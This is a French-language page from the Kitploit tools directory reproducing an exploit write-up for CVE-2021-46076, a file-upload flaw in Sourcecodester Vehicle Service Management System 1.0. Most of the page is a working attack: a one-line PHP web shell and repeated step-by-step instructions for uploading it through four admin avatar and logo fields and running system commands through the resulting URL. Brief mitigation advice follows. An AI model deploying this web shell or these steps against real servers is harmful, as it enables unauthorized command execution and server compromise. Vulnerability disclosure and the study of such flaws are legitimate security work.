Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 est vulnérable au téléchargement de fichiers. Un attaquant peut télécharger un fichier PHP malveillant dans plusieurs points de terminaison, entraînant une exécution de code. | Kitploit
Outils/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 est vulnérable au téléchargement de fichiers. Un attaquant peut télécharger un fichier PHP malveillant dans plusieurs points de terminaison, entraînant une exécution de code.

Voir le dépôt
il y a 3 moisPas encore vérifié

CVE-2021-46076

Titre de l'exploit : Vehicle Service Management System - 'Multiple' téléchargement de fichier conduit à une exécution de code

Auteur de l'exploit : SANU P.L

CVE : CVE-2021-46076

CVSS : 8.8 ÉLEVÉE

Références :

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46076
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076

Description :

Sourcecodester Vehicle Service Management System 1.0 est vulnérable au téléchargement de fichier. Un attaquant peut télécharger un fichier php malveillant sur plusieurs points de terminaison, ce qui conduit à une exécution de code.

1. Vehicle Service Management System - 'Mon compte' (/admin/?page=user)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section Mon compte http://localhost/vehicle_service/admin/?page=user

Charge utile :

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Enregistrez le code php ci-dessus, par exemple : Cmd.php
  2. Dans la section Mon compte, saisissez toutes les informations requises et sélectionnez le fichier php dans Avatar.
  3. Cliquez sur le bouton Mettre à jour.
  4. Ouvrez l'image de l'avatar dans un nouvel onglet.
  5. Ajoutez le paramètre cmd dans l'URL et exécutez les commandes.
  6. URL finale : http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Exécutez toutes les commandes système, par exemple : id, whoami, pwd, etc.

2. Vehicle Service Management System - 'Liste des utilisateurs' (/admin/?page=user/manage_user)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section Liste des utilisateurs et cliquez sur le bouton Créer un nouveau.

Charge utile :

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Enregistrez le code php ci-dessus, par exemple : Cmd.php
  2. Dans la page Créer un nouvel utilisateur, saisissez toutes les informations requises et sélectionnez le fichier php dans Avatar.
  3. Cliquez sur le bouton Enregistrer.
  4. Ouvrez l'image de l'avatar dans un nouvel onglet.
  5. Ajoutez le paramètre cmd dans l'URL et exécutez les commandes.
  6. URL finale : http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Exécutez toutes les commandes système, par exemple : id, whoami, pwd, etc.

3. Vehicle Service Management System - 'Paramètres - Logo du système' (/admin/?page=system_info)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section Paramètres http://localhost/vehicle_service/admin/?page=system_info

Charge utile :

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Enregistrez le code php ci-dessus, par exemple : Cmd.php
  2. Dans la section Paramètres, saisissez toutes les informations requises et sélectionnez le fichier php dans Logo du système.
  3. Cliquez sur le bouton Mettre à jour.
  4. Ouvrez l'image du logo du système dans un nouvel onglet.
  5. Ajoutez le paramètre cmd dans l'URL et exécutez les commandes.
  6. URL finale : http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Exécutez toutes les commandes système, par exemple : id, whoami, pwd, etc.

4. Vehicle Service Management System - 'Paramètres - Couverture du site web' (/admin/?page=system_info)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section Paramètres http://localhost/vehicle_service/admin/?page=system_info

Charge utile :

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Enregistrez le code php ci-dessus, par exemple : Cmd.php
  2. Dans la section Paramètres, saisissez toutes les informations requises et sélectionnez le fichier php dans Couverture du site web.
  3. Cliquez sur le bouton Mettre à jour.
  4. Ouvrez l'image de la couverture du site web dans un nouvel onglet.
  5. Ajoutez le paramètre cmd dans l'URL et exécutez les commandes.
  6. URL finale : http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Exécutez toutes les commandes système, par exemple : id, whoami, pwd, etc.

Impact :

Un attaquant peut télécharger un fichier php malveillant sur plusieurs points de terminaison, ce qui conduit à une exécution de code.

Atténuation :

Il est recommandé de mettre en œuvre les mesures suivantes :

  • N'accepter jamais un nom de fichier et son extension directement sans avoir un filtre de liste blanche.
  • S'il n'est pas nécessaire d'avoir des caractères Unicode, il est fortement recommandé de n'accepter que des caractères alphanumériques et un seul point comme entrée pour le nom du fichier et l'extension.
  • Limiter la taille du fichier à une valeur maximale afin d'empêcher les attaques par déni de service.
  • Le répertoire de téléchargement ne doit avoir aucune permission d'« exécution ».
  • Ne pas se fier uniquement à la validation côté client.
Télécharger l’outil